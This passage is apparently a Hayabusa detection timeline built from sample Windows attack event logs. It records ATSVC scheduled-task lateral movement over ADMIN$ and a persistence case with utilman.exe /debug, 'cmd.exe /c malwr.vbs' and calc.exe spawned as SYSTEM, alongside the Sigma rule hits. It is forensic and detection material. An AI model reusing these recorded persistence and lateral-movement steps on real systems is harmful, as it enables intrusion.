Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 
+2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.508 
+09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : 
User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 
Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 
+09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: 
C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
